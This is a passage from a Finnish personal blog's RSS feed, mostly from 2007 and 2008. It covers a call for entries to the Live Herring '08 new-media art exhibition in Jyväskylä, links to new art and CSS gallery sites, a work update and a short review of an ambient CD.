29.10. - 16.11. 2008 Jyväskylä, Finland</strong></p>
<p>Live Herring ‘08 kutsuu pohjoismaiset taiteilijat tarjoamaan näyttelyyn uusmediataideteoksia, digitaalisia kuvia ja aiheeseen liittyviä työpaja-ehdotuksia.</p>
<p>Teosten ilmoittautuminen alkaa: 15.10. 2007<br />
Teosten ilmoittautuminen päättyy: 30.4.2008<br />
Ei jurytys- tai osallistumismaksua.</p>
<p>Live Herring ‘08 näyttely etsii kaikenlaista pohjoismaista uusmediataidetta verkkotaiteesta installaatioihin ja tietokonetaiteesta ääniteoksiin. Valittujen teosten / taiteilijoiden lista julkaistaan Live Herring -verkkosivulla (www.liveherring.org) 15.6.2008. Live Herring etsii myös työpaja-ehdotuksia. Näyttelyyn voi tarjota uusmediataideteoksia kaikista genreistä. Taideteokset voivat olla interaktiivisia, staattisia, online tai offline, hypernarratiivisia tai abstrakteja.
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ihminen.org/blogi/2008/01/30/laheta-meille-teoksesi/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Uutta netissä.</title>
		<link>http://www.ihminen.org/blogi/2007/10/30/uutta-netissa/</link>
		<comments>http://www.ihminen.org/blogi/2007/10/30/uutta-netissa/#comments</comments>
		<pubDate>Tue, 30 Oct 2007 11:16:26 +0000</pubDate>
		<dc:creator>Mikael</dc:creator>
		
		<category>Media</category>

		<category>Linkkivinkit</category>

		<guid isPermaLink="false">http://www.ihminen.org/blogi/2007/10/30/uutta-netissa/</guid>
		<description><![CDATA[Viimeaikoina kutsuja on tipahdellut vaikka mihin nettisivuille. Tietty nyt nää normaalit facebook/linkedID -kutsut mutta lisäksi:
www.pinkisart.com
&#8220;Helmikuussa 2008 ensimmäisen kerran ilmestyvä taidelehti PINKISART etsii uusia, nuoria taiteilijoita ja suunnittelijoita sivuillensa esittelemään töitään.
PINKISART tulee olemaan ilmaisjakelulehti, jonka ensimmäinen painos on 2000-2500 kpl ja jonka kohderyhmä on taiteilijat, taide/design opiskelijat, galleriat/museot ja niiden asiakkaat, taidekeräilijät ja kaikki nykyajan visuaalisesta [...]]]></description>
			<content:encoded><![CDATA[<p>Viimeaikoina kutsuja on tipahdellut vaikka mihin nettisivuille. Tietty nyt nää normaalit facebook/linkedID -kutsut mutta lisäksi:</p>
<p><b><a href="http://www.pinkisart.com/" onclick="javascript:urchinTracker ('/outbound/article/www.pinkisart.com');">www.pinkisart.com</a></b></p>
<blockquote><p><em>&#8220;Helmikuussa 2008 ensimmäisen kerran ilmestyvä taidelehti PINKISART etsii uusia, nuoria taiteilijoita ja suunnittelijoita sivuillensa esittelemään töitään.</p>
<p>PINKISART tulee olemaan ilmaisjakelulehti, jonka ensimmäinen painos on 2000-2500 kpl ja jonka kohderyhmä on taiteilijat, taide/design opiskelijat, galleriat/museot ja niiden asiakkaat, taidekeräilijät ja kaikki nykyajan visuaalisesta kulttuurista kiinnostuneet ihmiset.&#8221;</em></p></blockquote>
<p><b><a href="http://www.cssnordic.net/" onclick="javascript:urchinTracker ('/outbound/article/www.cssnordic.net');">www.cssnordic.net</a></b></p>
<blockquote><p><em>CSS Nordic on uusi, vain pohjoismaalaisille web-suunnittelijoille<br />
suunnattu CSS-galleria. Palvelu avataan käyttäjille virallisesti 1.<br />
päivä marraskuuta.</em></p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://www.ihminen.org/blogi/2007/10/30/uutta-netissa/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Huh!</title>
		<link>http://www.ihminen.org/blogi/2007/10/05/huh/</link>
		<comments>http://www.ihminen.org/blogi/2007/10/05/huh/#comments</comments>
		<pubDate>Fri, 05 Oct 2007 11:22:13 +0000</pubDate>
		<dc:creator>Mikael</dc:creator>
		
		<category>Arki</category>

		<category>Duuni</category>

		<guid isPermaLink="false">http://www.ihminen.org/blogi/2007/10/05/huh/</guid>
		<description><![CDATA[Aika haipakkaa menoa on elo ollut työrintamalla. Uusia asiakkuuksia, oma toimisto keskustassa ja liuta mielenkiintoisia apuraha- ja ei raha projekteja. Lisäksi siirryin Älypää Oy:n mukana SanomaWSOY-konserniin töihin, Swelcomin ostaessa Älpylän.
Kulkuri-lehden pyörittämisessä on ollut omat kommervenkkinsä ajan puutteen vuoksi, mutta olen nyt saanut avukseni kaksi mainiota ilmoitusmyyjää. Voi itse keskittyä lehden ulkoasun kehittämiseen ja toimitustyöhön.
Huh, ja [...]]]></description>
			<content:encoded><![CDATA[<p>Aika haipakkaa menoa on elo ollut työrintamalla. Uusia asiakkuuksia, oma toimisto keskustassa ja liuta mielenkiintoisia apuraha- ja ei raha projekteja. Lisäksi siirryin Älypää Oy:n mukana SanomaWSOY-konserniin töihin, <a href="http://www.digitoday.fi/bisnes/2007/09/21/%C4lyp%E4%E4+kasvaa+Sanoman+muskeleilla/200723361/66" onclick="javascript:urchinTracker ('/outbound/article/www.digitoday.fi');">Swelcomin ostaessa Älpylän</a>.</p>
<p>Kulkuri-lehden pyörittämisessä on ollut omat kommervenkkinsä ajan puutteen vuoksi, mutta olen nyt saanut avukseni kaksi mainiota ilmoitusmyyjää. Voi itse keskittyä lehden ulkoasun kehittämiseen ja toimitustyöhön.</p>
<p>Huh, ja kohta Japaniin! Jänskäpänskä.
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ihminen.org/blogi/2007/10/05/huh/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Seikkailuni dark ambientin kummalliseen maailmaan</title>
		<link>http://www.ihminen.org/blogi/2007/07/13/seikkailuni-dark-ambientin-kummalliseen-maailmaan/</link>
		<comments>http://www.ihminen.org/blogi/2007/07/13/seikkailuni-dark-ambientin-kummalliseen-maailmaan/#comments</comments>
		<pubDate>Fri, 13 Jul 2007 20:39:29 +0000</pubDate>
		<dc:creator>Mikael</dc:creator>
		
		<category>Tempaukset</category>

		<guid isPermaLink="false">http://www.ihminen.org/blogi/2007/07/13/seikkailu-dark-ambientin-kummalliseen-maailmaan/</guid>
		<description><![CDATA[No, joo&#8230; kummalliseen varmasti sikäli, että olen tottunut kuuntelemaan aika &#8220;kummallista&#8221; musiikkia (tai näin mulle on väitetty). Nyt löytämäni CD oli niin kummallista ettei sitä jaksa enää toista kuuntelukertaa. Ambientin ystävä en varsinaisesti ole, mutta vaihdoin Turhuuksien torilta itselleni no Xivicin aka Henkka Kyllösen &#8220;Uneksija&#8221;-CD:n. Noise.fi väittää tätä ihan päteväksi kamaksi sarallaan.
Annan levyn kuitenkin mielelläni [...]]]></description>
			<content:encoded><![CDATA[<p>No, joo&#8230; kummalliseen varmasti sikäli, että olen tottunut kuuntelemaan aika &#8220;<i>kummallista</i>&#8221; musiikkia (tai näin mulle on väitetty). Nyt löytämäni CD oli niin <i>kummallista</i> ettei sitä jaksa enää toista kuuntelukertaa. Ambientin ystävä en varsinaisesti ole, mutta vaihdoin <a href="http://www.ihminen.org/liveherring/turhuuksien-tori/" >Turhuuksien torilta</a> itselleni no Xivicin aka Henkka Kyllösen &#8220;Uneksija&#8221;-CD:n. <a href="http://www.noise.fi/levyarvostelut/?id=2141" onclick="javascript:urchinTracker ('/outbound/article/www.noise.fi');">Noise.fi väittää</a> tätä ihan päteväksi kamaksi sarallaan.</p>
<p>Annan levyn kuitenkin mielelläni eteenpäin kiertoon, joten jos jotakuta tämä kiinnostaa, laittakoon sähköpostia tahi kommenttia! Ensimmäinen saa ilmaiseksi.
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ihminen.org/blogi/2007/07/13/seikkailuni-dark-ambientin-kummalliseen-maailmaan/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
